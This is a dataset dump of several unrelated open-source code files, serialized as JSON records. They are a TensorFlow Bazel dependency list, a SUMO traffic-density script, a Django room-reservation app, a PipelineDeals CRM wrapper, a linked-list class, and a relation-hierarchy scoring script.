\"https://storage.googleapis.com/download.tensorflow.org/models/tflite/conv_actions_tflite.zip\",\n ],\n )\n\n tf_http_archive(\n name = \"tflite_ovic_testdata\",\n build_file = \"//third_party:tflite_ovic_testdata.BUILD\",\n sha256 = \"033c941b7829b05ca55a124a26a6a0581b1ececc154a2153cafcfdb54f80dca2\",\n strip_prefix = \"ovic\",\n urls = [\n \"https://storage.googleapis.com/mirror.tensorflow.org/storage.googleapis.com/download.tensorflow.org/data/ovic_2019_04_30.zip\",\n \"https://storage.googleapis.com/download.tensorflow.org/data/ovic_2019_04_30.zip\",\n ],\n )\n\n tf_http_archive(\n name = \"build_bazel_rules_android\",\n sha256 = \"cd06d15dd8bb59926e4d65f9003bfc20f9da4b2519985c27e190cddc8b7a7806\",\n strip_prefix = \"rules_android-0.1.1\",\n urls = tf_mirror_urls(\"https://github.com/bazelbuild/rules_android/archive/v0.1.1.zip\"),\n )\n\n tf_http_archive(\n name = \"rules_android_ndk\",\n sha256 = \"b29409496439cdcdb50a8e161c4953ca78a548e16d3ee729a1b5cd719ffdacbf\",\n strip_prefix = \"rules_android_ndk-81ec8b79dc50ee97e336a25724fdbb28e33b8d41\",\n urls = tf_mirror_urls(\"https://github.com/bazelbuild/rules_android_ndk/archive/81ec8b79dc50ee97e336a25724fdbb28e33b8d41.zip\"),\n )\n\n # Apple and Swift rules.\n # https://github.com/bazelbuild/rules_apple/releases\n tf_http_archive(\n name = \"build_bazel_rules_apple\",\n sha256 = \"a6141240657093fa7ccc7ca1ee5a62408dd9996d1bf47bc2369b8b9faefb2698\",\n urls = tf_mirror_urls(\"https://github.com/bazelbuild/rules_apple/releases/download/2.3.0/rules_apple.2.3.0.tar.gz\"),\n )\n\n # https://github.com/bazelbuild/rules_swift/releases\n tf_http_archive(\n name = \"build_bazel_rules_swift\",\n sha256 = \"32f95dbe6a88eb298aaa790f05065434f32a662c65ec0a6aabdaf6881e4f169f\",\n urls = tf_mirror_urls(\"https://github.com/bazelbuild/rules_swift/releases/download/1.5.0/rules_swift.1.5.0.tar.gz\"),\n )\n\n # https://github.com/bazelbuild/apple_support/releases\n tf_http_archive(\n name = \"build_bazel_apple_support\",\n sha256 = \"9f7bb62c3ae889e0eae8c18458fd8764e2e537687d9a1d85885d6af980e4fc31\",\n urls = tf_mirror_urls(\"https://github.com/bazelbuild/apple_support/releases/download/1.6.0/apple_support.1.6.0.tar.gz\"),\n )\n\n # 
https://github.com/apple/swift-protobuf/releases\n tf_http_archive(\n name = \"com_github_apple_swift_swift_protobuf\",\n strip_prefix = \"swift-protobuf-1.19.0/\",\n sha256 = \"f057930b9dbd17abeaaceaa45e9f8b3e87188c05211710563d2311b9edf490aa\",\n urls = tf_mirror_urls(\"https://github.com/apple/swift-protobuf/archive/1.19.0.tar.gz\"),\n )\n\n tf_http_archive(\n name = \"xctestrunner\",\n strip_prefix = \"xctestrunner-4c5709da9444eae6bba2425734b8654635bed0a6\",\n sha256 = \"e5d4c53c3965ae943fb08ccd7df0efd75590213fce5052388f23fad81a649f5a\",\n urls = tf_mirror_urls(\"https://github.com/google/xctestrunner/archive/4c5709da9444eae6bba2425734b8654635bed0a6.tar.gz\"),\n )\n\n tf_http_archive(\n name = \"nlohmann_json_lib\",\n build_file = \"//third_party:nlohmann_json.BUILD\",\n sha256 = \"5daca6ca216495edf89d167f808d1d03c4a4d929cef7da5e10f135ae1540c7e4\",\n strip_prefix = \"json-3.10.5\",\n urls = tf_mirror_urls(\"https://github.com/nlohmann/json/archive/v3.10.5.tar.gz\"),\n )\n\n tf_http_archive(\n name = \"pybind11\",\n urls = tf_mirror_urls(\"https://github.com/pybind/pybind11/archive/v2.10.4.tar.gz\"),\n sha256 = \"832e2f309c57da9c1e6d4542dedd34b24e4192ecb4d62f6f4866a737454c9970\",\n strip_prefix = \"pybind11-2.10.4\",\n build_file = \"//third_party:pybind11.BUILD\",\n system_build_file = \"//third_party/systemlibs:pybind11.BUILD\",\n )\n\n tf_http_archive(\n name = \"pybind11_protobuf\",\n urls = tf_mirror_urls(\"https://github.com/pybind/pybind11_protobuf/archive/80f3440cd8fee124e077e2e47a8a17b78b451363.zip\"),\n sha256 = \"c7ab64b1ccf9a678694a89035a8c865a693e4e872803778f91f0965c2f281d78\",\n strip_prefix = \"pybind11_protobuf-80f3440cd8fee124e077e2e47a8a17b78b451363\",\n patch_file = [\"//third_party/pybind11_protobuf:remove_license.patch\"],\n )\n\n tf_http_archive(\n name = \"coremltools\",\n sha256 = \"89bb0bd2c16e19932670838dd5a8b239cd5c0a42338c72239d2446168c467a08\",\n strip_prefix = \"coremltools-5.2\",\n build_file = \"//third_party:coremltools.BUILD\",\n urls = tf_mirror_urls(\"https://github.com/apple/coremltools/archive/5.2.tar.gz\"),\n )\n\n # Dependencies required by grpc\n # - pin rules_go to a newer version so it's compatible with Bazel 6.0\n # - patch upb so that it's compatible with Bazel 6.0, the latest version of upb doesn't work with the old grpc version.\n tf_http_archive(\n name = \"io_bazel_rules_go\",\n sha256 = \"16e9fca53ed6bd4ff4ad76facc9b7b651a89db1689a2877d6fd7b82aa824e366\",\n urls = tf_mirror_urls(\"https://github.com/bazelbuild/rules_go/releases/download/v0.34.0/rules_go-v0.34.0.zip\"),\n )\n\n tf_http_archive(\n name = \"upb\",\n sha256 = \"61d0417abd60e65ed589c9deee7c124fe76a4106831f6ad39464e1525cef1454\",\n strip_prefix = \"upb-9effcbcb27f0a665f9f345030188c0b291e32482\",\n patch_file = [\"//third_party/grpc:upb_platform_fix.patch\"],\n urls = tf_mirror_urls(\"https://github.com/protocolbuffers/upb/archive/9effcbcb27f0a665f9f345030188c0b291e32482.tar.gz\"),\n )\n\n tf_http_archive(\n name = \"com_github_glog_glog\",\n sha256 = \"f28359aeba12f30d73d9e4711ef356dc842886968112162bc73002645139c39c\",\n strip_prefix = \"glog-0.4.0\",\n urls = tf_mirror_urls(\"https://github.com/google/glog/archive/refs/tags/v0.4.0.tar.gz\"),\n )\n\n tf_http_archive(\n name = \"com_google_ortools\",\n sha256 = \"bc4b07dc9c23f0cca43b1f5c889f08a59c8f2515836b03d4cc7e0f8f2c879234\",\n strip_prefix = \"or-tools-9.6\",\n patch_file = [\"//third_party/ortools:ortools.patch\"],\n urls = tf_mirror_urls(\"https://github.com/google/or-tools/archive/v9.6.tar.gz\"),\n repo_mapping = {\n 
\"@com_google_protobuf_cc\": \"@com_google_protobuf\",\n \"@eigen\": \"@eigen_archive\",\n },\n )\n\n tf_http_archive(\n name = \"glpk\",\n sha256 = \"9a5dab356268b4f177c33e00ddf8164496dc2434e83bd1114147024df983a3bb\",\n build_file = \"//third_party/ortools:glpk.BUILD\",\n urls = [\n \"https://storage.googleapis.com/mirror.tensorflow.org/ftp.gnu.org/gnu/glpk/glpk-4.52.tar.gz\",\n \"http://ftp.gnu.org/gnu/glpk/glpk-4.52.tar.gz\",\n ],\n )\n\n tf_http_archive(\n name = \"scip\",\n sha256 = \"fe7636f8165a8c9298ff55ed3220d084d4ea31ba9b69d2733beec53e0e4335d6\",\n strip_prefix = \"scip-803\",\n build_file = \"//third_party/ortools:scip.BUILD\",\n patch_file = [\"//third_party/ortools:scip.patch\"],\n urls = tf_mirror_urls(\"https://github.com/scipopt/scip/archive/refs/tags/v803.tar.gz\"),\n )\n\n tf_http_archive(\n name = \"bliss\",\n build_file = \"//third_party/ortools:bliss.BUILD\",\n sha256 = \"f57bf32804140cad58b1240b804e0dbd68f7e6bf67eba8e0c0fa3a62fd7f0f84\",\n urls = tf_mirror_urls(\"https://github.com/google/or-tools/releases/download/v9.0/bliss-0.73.zip\"),\n #url = \"http://www.tcs.hut.fi/Software/bliss/bliss-0.73.zip\",\n )\n\n # Riegeli is imported twice since there are two targets (third_party/riegeli and\n # third_party/py/riegeli) that are used in TF.\n tf_http_archive(\n name = \"riegeli\",\n sha256 = \"870ca080cdfc5eba696a72ccc3a54cbf0f2271befc0d459eafa8f065edfaadb2\",\n strip_prefix = \"riegeli-264ef7b4a1314d97265b37544b27cd3923ea72d2\",\n urls = tf_mirror_urls(\"https://github.com/google/riegeli/archive/264ef7b4a1314d97265b37544b27cd3923ea72d2.zip\"),\n )\n\n tf_http_archive(\n name = \"riegeli_py\",\n sha256 = \"870ca080cdfc5eba696a72ccc3a54cbf0f2271befc0d459eafa8f065edfaadb2\",\n patch_file = [\"//third_party:riegeli_fix.patch\"],\n strip_prefix = \"riegeli-264ef7b4a1314d97265b37544b27cd3923ea72d2\",\n urls = tf_mirror_urls(\"https://github.com/google/riegeli/archive/264ef7b4a1314d97265b37544b27cd3923ea72d2.zip\"),\n )\n\n # Required by riegeli.\n tf_http_archive(\n name = \"org_brotli\",\n sha256 = \"84a9a68ada813a59db94d83ea10c54155f1d34399baf377842ff3ab9b3b3256e\",\n strip_prefix = \"brotli-3914999fcc1fda92e750ef9190aa6db9bf7bdb07\",\n urls = tf_mirror_urls(\"https://github.com/google/brotli/archive/3914999fcc1fda92e750ef9190aa6db9bf7bdb07.zip\"), # 2022-11-17\n )\n\n # Required by riegeli.\n tf_http_archive(\n name = \"net_zstd\",\n build_file = \"//third_party:net_zstd.BUILD\",\n sha256 = \"b6c537b53356a3af3ca3e621457751fa9a6ba96daf3aebb3526ae0f610863532\",\n strip_prefix = \"zstd-1.4.5/lib\",\n urls = tf_mirror_urls(\"https://github.com/facebook/zstd/archive/v1.4.5.zip\"), # 2020-05-22\n )\n\n tf_http_archive(\n name = \"com_google_highway\",\n sha256 = \"2eb48f87c099a95123dc13a9f243bd3b74d67fe1d887942903d09a211593da97\",\n strip_prefix = \"highway-1.0.7\",\n urls = tf_mirror_urls(\"https://github.com/google/highway/archive/refs/tags/1.0.7.zip\"),\n )\n\n # used for adding androidx.annotation dependencies in tflite android jni.\n maven_install(\n artifacts = [\n \"androidx.annotation:annotation:aar:1.1.0\",\n ],\n repositories = [\n \"https://jcenter.bintray.com\",\n \"https://maven.google.com\",\n \"https://dl.google.com/dl/android/maven2\",\n \"https://repo1.maven.org/maven2\",\n ],\n fetch_sources = True,\n version_conflict_policy = \"pinned\",\n )\n\ndef workspace():\n # Check the bazel version before executing any repository rules, in case\n # those rules rely on the version we require here.\n versions.check(\"1.0.0\")\n\n # Initialize toolchains and platforms.\n 
_tf_toolchains()\n\n # Import third party repositories according to go/tfbr-thirdparty.\n _initialize_third_party()\n\n # Import all other repositories. This should happen before initializing\n # any external repositories, because those come with their own\n # dependencies. Those recursive dependencies will only be imported if they\n # don't already exist (at least if the external repository macros were\n # written according to common practice to query native.existing_rule()).\n _tf_repositories()\n\n tfrt_dependencies()\n\n# Alias so it can be loaded without assigning to a different symbol to prevent\n# shadowing previous loads and trigger a buildifier warning.\ntf_workspace2 = workspace\n","repo_name":"tensorflow/tensorflow","sub_path":"tensorflow/workspace2.bzl","file_name":"workspace2.bzl","file_ext":"bzl","file_size_in_byte":44365,"program_lang":"python","lang":"en","doc_type":"code","stars":178918,"dataset":"github-code","pt":"18"} +{"seq_id":"35861331850","text":"import csv\r\n\r\n\r\n# Open the input CSV file and the output CSV file\r\nwith open(r'D:\\\\ITS-2023\\\\Scenario\\\\fcd_export.csv', 'r') as f_in:\r\n # Create CSV reader and writer objects\r\n reader = csv.DictReader(f_in)\r\n s = set()\r\n \r\n total_time = 1160 #always change its value to final time\r\n updated_total_time = total_time - 60\r\n tme = (updated_total_time // 5) + 2\r\n # tme = (updated_total_time // 10) + 2\r\n l = [0] * int(tme)\r\n m = [[] for _ in range(tme)]\r\n vehicle_ids= [[] for _ in range(tme)]\r\n init_time = 0\r\n end_time = 60\r\n Velocity = []\r\n total_size = tme\r\n ranges = []\r\n increment = 60\r\n start = 0\r\n\r\n for _ in range(total_size):\r\n end = start + increment\r\n ranges.append((start, end))\r\n start += 5\r\n # start += 10\r\n\r\n num_vehicles=[]\r\n\r\n # and int(row['vehicle_id']) > 453\r\n for row in reader:\r\n # while float(row['vehicle_insertion_time']) < end_time:\r\n # print(row)\r\n if float(row['pos']) > 0 and float(row['pos'] )<= 400 and (row['lane']=='E0_0' or row['lane']=='E0_1'):\r\n for start, end in ranges:\r\n if start < (float(row['time'])) < end:\r\n l[start // 5] += 1\r\n m[start // 5].append(float(row['speed']))\r\n vehicle_ids[start // 5].append(int(row['vehicle_id']))\r\n # vehicle_ids_car[start // 5].append(int(row['vehicle_id']))\r\n\r\n # l[start // 10] += 1\r\n # m[start // 10].append(float(row['speed']))\r\n # vehicle_ids[start // 10].append(int(row['vehicle_id']))\r\n\r\n # s.add(float(row['vehicle_id']))\r\n # num_vehicles.append(len(s))\r\n # writer = csv.writer(f_out)\r\n # writer.writerow(['#Minutes', '#Vehicles'])\r\n # for i, d in enumerate(l):\r\n # writer.writerow([i+1, d])\r\n # print(l)\r\n\r\n non_empty_m = [lst for lst in m if lst]\r\n sum = 0\r\n for i in non_empty_m:\r\n for j in i:\r\n sum += j\r\n Velocity.append(sum / len(i))\r\n sum = 0\r\n\r\n \r\n for i in vehicle_ids:\r\n s=set()\r\n for j in i:\r\n s.add(j)\r\n num_vehicles.append(len(s))\r\n non_zero_num_vehicles = [num for num in num_vehicles if num != 0]\r\n # print(len(non_zero_num_vehicles))\r\n # print(len(Velocity))\r\n ranges = ranges[0:]\r\n # print(len(ranges))\r\n rows = zip(ranges, non_zero_num_vehicles, Velocity)\r\n\r\n with open('E_Veh_Density_and_Velocity_Total-5.csv', 'w', newline='') as f_out:\r\n writer = csv.writer(f_out)\r\n writer.writerow(['Interval', 'Vehicles', 'Speed']) # Write header row\r\n writer.writerows(rows)","repo_name":"MayankSingh-git/SUMO-Python-Code","sub_path":"5. E_veh_density_and_speed_window.py","file_name":"5. 
E_veh_density_and_speed_window.py","file_ext":"py","file_size_in_byte":2717,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"70018741479","text":"from django.shortcuts import render, redirect\nfrom django.views import View\nfrom room_res.models import Room, RoomReservation\nimport datetime\n\ndef index(request):\n return render(request, 'base.html')\n\nclass AddRoomView(View):\n def get(self, request):\n return render(request, \"add_room.html\")\n\n def post(self, request):\n name = request.POST.get(\"name\")\n capacity = request.POST.get(\"capacity\")\n capacity = int(capacity) if capacity else 0\n projector = request.POST.get(\"projector\") == \"on\"\n\n if not name:\n return render(request, \"add_room.html\", context={\"error\": \"Enter correct Room name\"})\n if capacity <= 0:\n return render(request, \"add_room.html\", context={\"error\": \"Capacity must be more than zero\"})\n if Room.objects.filter(name=name).first():\n return render(request, \"add_room.html\", context={\"error\": \"This Room already exist\"})\n\n Room.objects.create(name=name, capacity=capacity, projector_availability=projector)\n return redirect(\"/rooms/\")\n\n\nclass RoomListView(View):\n def get(self, request):\n rooms = Room.objects.all()\n context = {'rooms':rooms}\n for room in rooms:\n reservation_dates = [reservation.date for reservation in room.roomreservation_set.all()]\n room.reserved = datetime.date.today() in reservation_dates\n return render(request, 'rooms.html', context)\n\n\ndef room_delete(request, id):\n if request.method == \"GET\":\n return render(request, 'delete_room.html', {'rooms':Room.objects.get(pk=id)})\n else:\n if request.POST['submit'] == 'Yes':\n room = Room.objects.get(pk=id)\n room.delete()\n return redirect(\"/rooms/\")\n\n\ndef room_modify(request, id):\n if request.method == 'GET':\n context = {'room':Room.objects.get(pk=id)}\n return render(request, \"modify_room.html\", context)\n else:\n room = Room.objects.get(id=id)\n name = request.POST.get(\"name\")\n capacity = request.POST.get(\"capacity\")\n capacity = int(capacity) if capacity else 0\n projector = request.POST.get(\"projector\") == \"on\"\n if not name:\n return render(request, \"modify_room.html\", context={\"room\": room, \"error\": \"Enter new name\"})\n if capacity <= 0:\n return render(request, \"modify_room.html\", context={\"room\": room, \"error\": \"Enter correct capacity\"})\n if name != room.name and Room.objects.filter(name=name).first():\n return render(request, \"modify_room.html\", context={\"room\": room, \"error\": \"This Room already exist\"})\n room.name = name\n room.capacity = capacity\n room.projector_availability = projector\n room.save()\n return redirect(\"/rooms/\")\n\n\n\nclass ReservationView(View):\n def get(self, request, id):\n return render(request, 'reservation.html', {'room':Room.objects.get(id=id)})\n def post(self, request, id):\n room_id = Room.objects.get(pk=id)\n date = request.POST.get('reservation_date')\n comment = request.POST.get('comment')\n reservations = room_id.roomreservation_set.filter(date__gte=str(datetime.date.today())).order_by('date')\n if RoomReservation.objects.filter(room_id=room_id, date=date):\n return render(request, 'reservation.html', context={'room':room_id, \"error\":\"Room is already booked this day\"})\n if date < str(datetime.date.today()):\n return render(request, 'reservation.html', context={\"room\":room_id, \"error\":\"Can't book in past!\"})\n 
RoomReservation.objects.create(room_id=room_id, date=date, comment=comment)\n        return redirect(\"/rooms/\")\n\nclass RoomDetailsView(View):\n    def get(self, request, id):\n        room = Room.objects.get(id=id)\n        reservations = room.roomreservation_set.filter(date__gte=str(datetime.date.today())).order_by('date')\n        return render(request, \"room_details.html\", context={\"room\": room, \"reservations\": reservations})\n\n\nclass SearchView(View):\n    def get(self, request):\n        name = request.GET.get(\"name\")\n        capacity = request.GET.get(\"capacity\")\n        capacity = int(capacity) if capacity else 0\n        projector = request.GET.get(\"projector\") == \"on\"\n\n        rooms = Room.objects.all()\n        if projector:\n            rooms = rooms.filter(projector_availability=projector)\n        if capacity:\n            rooms = rooms.filter(capacity__gte=capacity)\n        if name:\n            rooms = rooms.filter(name__icontains=name)\n\n        for room in rooms:\n            reservation_dates = [reservation.date for reservation in room.roomreservation_set.all()]\n            room.reserved = datetime.date.today() in reservation_dates\n\n        return render(request, \"rooms.html\", context={\"rooms\": rooms, \"date\": datetime.date.today()})\n","repo_name":"dymekmichal/first_room_reservation","sub_path":"room_res/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4842,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"6736459845","text":"class Node:\n\tdef __init__(self, val, next):\n\t\tself.next = next\n\t\tself.val = val\n\n\tdef get_next(self):\n\t\treturn self.next\n\n\tdef get_val(self):\n\t\treturn self.val\n\n\tdef set_next(self, node):\n\t\tif node:\n\t\t\tassert isinstance(node, Node)\n\t\tself.next = node\n\nclass LinkList:\n\tdef __init__(self, init_list = []):\n\t\tself.node = None\n\t\tpre_node = None\n\t\tfor e in init_list:\n\t\t\tnode = Node(e, None)\n\t\t\tif pre_node:\n\t\t\t\tpre_node.set_next(node)\n\t\t\telse:\n\t\t\t\tself.node = node\n\t\t\tpre_node = node\n\n\tdef _get(self, n):\n\t\tnode = self.node\n\t\tfor i in range(0, n + 1):\n\t\t\tif node:\n\t\t\t\tif i == n:\n\t\t\t\t\treturn node\n\t\t\t\telse:\n\t\t\t\t\tnode = node.get_next()\n\t\t\telse:\n\t\t\t\traise Exception(\"index %d out of link list range\"%(n))\n\n\tdef get(self, n):\n\t\treturn self._get(n).get_val()\n\n\tdef _check_next(self, node, n):\n\t\tif node and node.get_next():\n\t\t\tpass\n\t\telse:\n\t\t\traise Exception(\"index %d out of link list range\"%(n))\n\n\tdef delete(self, n):\n\t\tif n == 0:\n\t\t\tif self.node and self.node.get_next():\n\t\t\t\tself.node = self.node.get_next()\n\t\t\telse:\n\t\t\t\tself.node = None\n\t\telse:\n\t\t\tpre_node = self._get(n - 1)\n\t\t\tself._check_next(pre_node, n)\n\t\t\tpre_node.set_next(pre_node.get_next().get_next())\n\n\tdef to_list(self):\n\t\tres = []\n\t\tnode = self.node\n\t\twhile node:\n\t\t\tres.append(node.get_val())\n\t\t\tnode = node.get_next()\n\t\treturn res\n\n\tdef append(self, val):\n\t\tnode = self.node\n\t\tif node:\n\t\t\twhile(node.get_next()):\n\t\t\t\tnode = node.get_next()\n\t\t\tnode.set_next(Node(val, None))\n\t\telse:\n\t\t\tself.node = Node(val, None)\n\n\tdef is_empty(self):\n\t\treturn True if not self.node else False\n\n\tdef dump(self):\n\t\tcurr = self.node\n\t\tres = []\n\t\twhile curr:\n\t\t\tres.append(curr.get_val())\n\t\t\tcurr = curr.get_next()\n\t\telse:\n\t\t\treturn 
res\n","repo_name":"tzwenn/pyrlang","sub_path":"utils/link_list.py","file_name":"link_list.py","file_ext":"py","file_size_in_byte":1680,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"73027162920","text":"import json\nfrom flask import jsonify\nimport requests\nfrom requests.api import request\nfrom crm.pipelinedeals.entities.pipelinedeals_company import PipelinedealsCompany\nfrom crm.pipelinedeals.entities.pipelinedeals_deal import PipelinedealsDeal\nfrom crm.pipelinedeals.entities.pipelinedeals_person import PipelinedealsPerson\nfrom crm.pipelinedeals import util\n\nclass PipelinedealsApi():\n\n def company(self, context, params):\n '''get company by id'''\n\n endpoint='companies'\n response = json.loads(util.rest(\"GET\",endpoint,context['headers'][\"api_key\"],{},params['company_id']).text)\n company_obj = PipelinedealsCompany(\n name=response['name'],\n website=response['web'],\n email=response['email'],\n address=response['address_1'],\n city=response['city'],\n state=response['state'],\n postal_code=response['postal_code'],\n country=response['country']\n )\n return company_obj.__dict__\n\n def deal(self, context, params):\n '''get deal by id'''\n \n endpoint='deals'\n response = json.loads(util.rest(\"GET\",endpoint,context['headers'][\"api_key\"],{},params['deal_id']).text)\n deal_obj = PipelinedealsDeal(\n name=response['name'],\n primary_contact_id=response['primary_contact_id'],\n status=response['status'],\n value=response['value']\n )\n return deal_obj.__dict__\n\n def person(self, context, params):\n '''get people by id'''\n \n endpoint='people'\n response = json.loads(util.rest(\"GET\",endpoint,context['headers'][\"api_key\"],{},params['person_id']).text)\n person_obj = PipelinedealsPerson(\n first_name=response['first_name'],\n last_name=response['last_name'],\n phone=response['phone'],\n position=response['position'],\n website=response['website'],\n email=response['email'],\n type=response['type'],\n work_address=response['work_address_1'],\n work_city=response['work_city'],\n work_state=response['work_state'],\n work_postal_code=response['work_postal_code'],\n work_country=response['work_country'],\n home_address=response['home_address_1'],\n home_city=response['home_city'],\n home_state=response['home_state'],\n home_country=response['home_country'],\n home_postal_code=response['home_postal_code'],\n summary=response['summary'],\n facebook_url=response['facebook_url']\n )\n return person_obj.__dict__\n\n def contacts_by_phone_number(self, context, params):\n '''get contacts by phone number'''\n\n endpoint = 'people/phone_number'\n response = json.loads(util.rest(\"GET\",endpoint,context['headers'][\"api_key\"],{},phone_number=params['person_phone']).text) \n contacts = response['entries']\n contact_value = []\n for contact in contacts:\n contact_obj = PipelinedealsPerson(\n contact_id=contact.get(\"id\") or None, \n first_name=contact.get(\"first_name\") or None,\n last_name=contact.get(\"last_name\") or None,\n phone=contact.get(\"phone\") or None,\n position=contact.get(\"position\") or None,\n website=contact.get(\"website\") or None,\n email=contact.get(\"email\") or None,\n type=contact.get(\"type\") or None,\n work_address=contact.get(\"work_address_1\") or None,\n work_city=contact.get(\"work_city\") or None,\n work_state=contact.get(\"work_state\") or None,\n work_postal_code=contact.get(\"work_postal_code\") or None,\n work_country=contact.get(\"work_country\") or None,\n 
home_address=contact.get(\"home_address_1\") or None,\n home_city=contact.get(\"home_city\") or None,\n home_state=contact.get(\"home_state\") or None,\n home_country=contact.get(\"home_country\") or None,\n home_postal_code=contact.get(\"home_postal_code\") or None,\n summary=contact.get(\"summary\") or None,\n facebook_url=contact.get(\"facebook_url\") or None,\n mobile=contact.get(\"mobile\") or None\n )\n contact_value.append(contact_obj.__dict__)\n return json.dumps(contact_value)\n","repo_name":"dipendrabaidawa/unified_api","sub_path":"unified/modules/main/categories/crm/pipelinedeals/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":6035,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"71716011239","text":"import pandas as pd\nimport numpy as np\nimport sys\nimport os\nimport mysql.connector\nfrom itertools import combinations\nfrom math import sqrt\nfrom numpy import dot\nfrom numpy.linalg import norm\n\ntrueHeirarchyFile = \"parent-child-pairs.csv\"\nembeddingSize = 300\n\n# wilson returns the wilson score given the p and n values\ndef wilson(p,n,z=1.96):\n denominator = 1 + z**2/n\n centre_adj_prob = p + z*z/(2*n)\n adj_std_dev = sqrt((p*(1-p) + z*z/(4*n))/n)\n lower_bound = (centre_adj_prob - z*adj_std_dev)/denominator\n return lower_bound\n\nmydb = mysql.connector.connect(\n host=\"localhost\",\n user=\"root\",\n password=\"\"\n)\n\nmycursor = mydb.cursor(dictionary=True)\n\nmycursor.execute(\"use btp\")\n\n# getAllIntersections returns all the intersection sizes of the pair of relations along with the support sizes of the relations.\n# This is accomplished via a join\ndef getAllIntersections():\n query = \"select dbpedia_intersect_size_restricted.size as 'intersectSize', binaryRel1, s1.size as 'size1', binaryRel2, s2.size as 'size2' from dbpedia_intersect_size_restricted, dbpedia_support_size_restricted s1, dbpedia_support_size_restricted s2 where s1.binaryRelation = binaryRel1 and s2.binaryRelation = binaryRel2\"\n mycursor.execute(query)\n result = mycursor.fetchall()\n return result\n\n# getAllRelationsToConsider returns all the relations with a non empty support set when the entity types are restricted\ndef getAllRelationsToConsider():\n query = \"select binaryRelation from dbpedia_support_size_restricted where size > 0\"\n mycursor.execute(query)\n result = mycursor.fetchall()\n rels = []\n for vals in result:\n rels.append(vals['binaryRelation'])\n return rels\n\n# getAllWilsonScores gets the wilson scores between all the relations that have non zero intersection sizes\ndef getAllWilsonScores(rels):\n allInters = getAllIntersections()\n relsWithScore = {}\n for row in allInters:\n intersect = row['intersectSize']\n rel1 = row['binaryRel1']\n rel2 = row['binaryRel2']\n size1 = row['size1']\n size2 = row['size2']\n\n if rel1 not in rels:\n continue\n if rel2 not in rels:\n continue\n\n if size1 > size2:\n size1,size2 = size2,size1\n rel1,rel2 = rel2,rel1\n\n score = wilson(intersect/size1,size1)\n relsWithScore[(rel2,rel1)] = score\n return relsWithScore\n\n# getTrueHeirarchy gets the true hierarchy from the csv file\ndef getTrueHeirarchy(rels):\n data = pd.read_csv(trueHeirarchyFile,header=None)\n heirarchy = [(x,y) for x,y in zip(data[0],data[1]) if x in rels and y in rels]\n return heirarchy\n\n# getHeirarchy creates the hierarchy with the best F1 score given the scores\ndef getHeirarchy(scores, heirarchy, toPrint):\n allPositives = len(heirarchy)\n truePositives = 0\n totalSet = 0\n prevScore 
= -1\n bestF1Score = -1\n cutoff = 0\n finalSize = 0\n finalPrecision = 0\n finalRecall = 0\n for (score,rel1,rel2) in scores:\n if score != prevScore and truePositives > 0:\n recall = truePositives/allPositives\n precision = truePositives/totalSet\n # print (\"Precision:\",precision, \"Recall:\",recall)\n f1 = 2 * precision * recall / (precision + recall)\n if f1 > bestF1Score:\n bestF1Score = f1\n cutoff = prevScore\n finalSize = totalSet\n finalRecall = recall\n finalPrecision = precision\n if (rel1,rel2) in heirarchy:\n truePositives += 1\n else:\n pass\n # print(rel1 + \",\" + rel2)\n totalSet += 1\n prevScore = score\n recall = truePositives/allPositives\n precision = truePositives/totalSet\n f1 = 2 * precision * recall / (precision + recall)\n if f1 > bestF1Score:\n bestF1Score = f1\n cutoff = 0\n if toPrint:\n print(\"Best F1 Score:\",bestF1Score)\n print(\"Cutoff:\",cutoff)\n print(\"Num Relations:\",finalSize)\n print(\"Precision:\",finalPrecision)\n print(\"Recall:\",finalRecall)\n return bestF1Score\n\n# getWords is used to split the relation name into words\ndef getWords(rel):\n words = []\n word = \"\"\n for c in rel:\n if c >='A' and c<='Z':\n words.append(word)\n word = \"\" + c.lower()\n else:\n word = word + c\n words.append(word)\n return words\n\n# readGloveEmbeddings is used to read the glove embeddings\ndef readGloveEmbeddings():\n embeddings_index = {}\n with open(\"../../glove/glove.6B.300d.txt\", encoding=\"utf-8\") as f:\n for line in f:\n word, coefs = line.split(maxsplit=1)\n coefs = np.fromstring(coefs, \"f\", sep=\" \")\n embeddings_index[word] = coefs\n print(\"Found %s word vectors.\" % len(embeddings_index))\n return embeddings_index\n\n# getEmbeddingsForRels gets the embeddings for all the relations passed. The method is described in the report.\ndef getEmbeddingsForRels(rels):\n embeddings_index = readGloveEmbeddings()\n embeddings = {}\n for rel in rels:\n words = getWords(rel)\n embedding = np.zeros(embeddingSize)\n for word in words:\n if word in embeddings_index:\n embedding += embeddings_index[word]\n embedding = embedding / len(words)\n embeddings[rel] = embedding\n return embeddings\n\n# getSimilarityBwEmbeddings is used to find the similarity scores between embeddings for all pairs of relations\ndef getSimilarityBwEmbeddings(rels,embeddings):\n simScores = {}\n for rel1 in rels:\n for rel2 in rels:\n score = 0\n if norm(embeddings[rel1])*norm(embeddings[rel2])!=0:\n score = dot(embeddings[rel1],embeddings[rel2])/(norm(embeddings[rel1])*norm(embeddings[rel2]))\n simScores[(rel1,rel2)] = score\n return simScores\n\n# getHeirarchyMixed is the function that gets the final scores based on the weight to both signals and call getHeirarchy\ndef getHeirarchyMixed(alpha,scores,simScores, rels, heirarchy, toPrint):\n beta = 1-alpha\n finalScores = []\n for rel1 in rels:\n for rel2 in rels:\n score = beta * simScores[(rel1,rel2)]\n if (rel1,rel2) in scores:\n score += scores[(rel1,rel2)]*alpha\n finalScores.append((score,rel1,rel2))\n finalScores.sort(reverse=True)\n return getHeirarchy(finalScores,heirarchy,toPrint)\n\n# getBestHeirarchy is used to find the best weight of the paramter used to weigh both the signals\ndef getBestHeirarchy(scores,simScores,rels,heirarchy):\n print(\"PATTY\")\n bestF1 = getHeirarchyMixed(1,scores,simScores,rels,heirarchy,True)\n bestAlpha = 1\n\n for alpha in np.linspace(0,1,20,endpoint=False):\n f1 = getHeirarchyMixed(alpha,scores,simScores,rels,heirarchy,False)\n if f1 > bestF1:\n bestF1 = f1\n bestAlpha = alpha\n\n 
